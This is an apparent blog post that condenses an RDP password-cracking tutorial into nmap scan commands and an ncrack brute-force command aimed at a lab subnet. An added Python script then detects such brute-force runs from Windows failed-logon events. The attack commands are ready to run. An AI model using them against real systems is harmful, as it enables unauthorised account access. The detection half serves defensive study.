Found a very well-written tutorial on how to crack an RDP host here.

In fewer lines, here is the how-to:

Scan
[cc lang="bash"]nmap -sP 192.168.56.0/24 | grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}' > 192.168.56.0.txt[/cc]

[cc lang="bash"]nmap -F -iL 192.168.56.0.txt[/cc]

Create a user list and a password list (my.usr and my.pwd)

[cc lang="bash"]ncrack -vv -U my.usr -P my.pwd 192.168.56.10:3389,CL=1[/cc]

That's it.

Do not use these tools on live production systems. For educational purposes only.
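
Seen from the target, a password-guessing run like the ncrack command above appears as a burst of failed logons (Windows Security event 4625) from one source address. The Python sketch below is an added example, not part of the original post or the linked tutorial; the comma-separated export format, the sample events, the source addresses and the threshold are constructed assumptions.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample (not real logs): simplified export of Windows Security
# events as timestamp,EventID,LogonType,TargetUserName,IpAddress.
SAMPLE_EVENTS = """\
2024-01-10T09:00:01,4625,3,administrator,192.168.56.20
2024-01-10T09:00:03,4625,3,administrator,192.168.56.20
2024-01-10T09:00:05,4625,3,administrator,192.168.56.20
2024-01-10T09:00:07,4625,3,backup,192.168.56.20
2024-01-10T09:00:09,4625,3,backup,192.168.56.20
2024-01-10T09:00:11,4625,3,backup,192.168.56.20
2024-01-10T09:00:13,4624,3,backup,192.168.56.20
2024-01-10T09:05:00,4625,10,alice,192.168.56.31
2024-01-10T09:20:00,4625,10,alice,192.168.56.31
2024-01-10T09:20:30,4624,10,alice,192.168.56.31
"""
FAILED, SUCCESS = 4625, 4624   # Windows logon failure / logon success
REMOTE_LOGON_TYPES = (3, 10)   # network (RDP with NLA) and RemoteInteractive

def parse(text):
    for line in text.strip().splitlines():
        ts, event_id, logon_type, user, ip = line.split(",")
        yield datetime.fromisoformat(ts), int(event_id), int(logon_type), user, ip

def find_bruteforce(text, threshold=5, window=timedelta(seconds=60)):
    """Flag sources with >= threshold failed remote logons inside one window,
    and record whether a successful logon from that source followed."""
    recent = defaultdict(deque)            # ip -> (timestamp, user) of recent failures
    alerts = {}
    for ts, event_id, logon_type, user, ip in sorted(parse(text)):
        if logon_type not in REMOTE_LOGON_TYPES:
            continue
        if event_id == SUCCESS and ip in alerts:
            alerts[ip]["success_after"] = user   # guessing may have worked
        if event_id != FAILED:
            continue
        q = recent[ip]
        q.append((ts, user))
        while ts - q[0][0] > window:       # drop failures older than the window
            q.popleft()
        if len(q) >= threshold:
            a = alerts.setdefault(ip, {"failures": 0, "users": set(), "success_after": None})
            a["failures"] = max(a["failures"], len(q))
            a["users"] |= {u for _, u in q}
    return alerts

if __name__ == "__main__":
    for ip, a in find_bruteforce(SAMPLE_EVENTS).items():
        print(ip, a["failures"], sorted(a["users"]), a["success_after"])
```

A source that is flagged and then logs on successfully is the case to investigate first; the two widely spaced failures from the second address stay below the threshold.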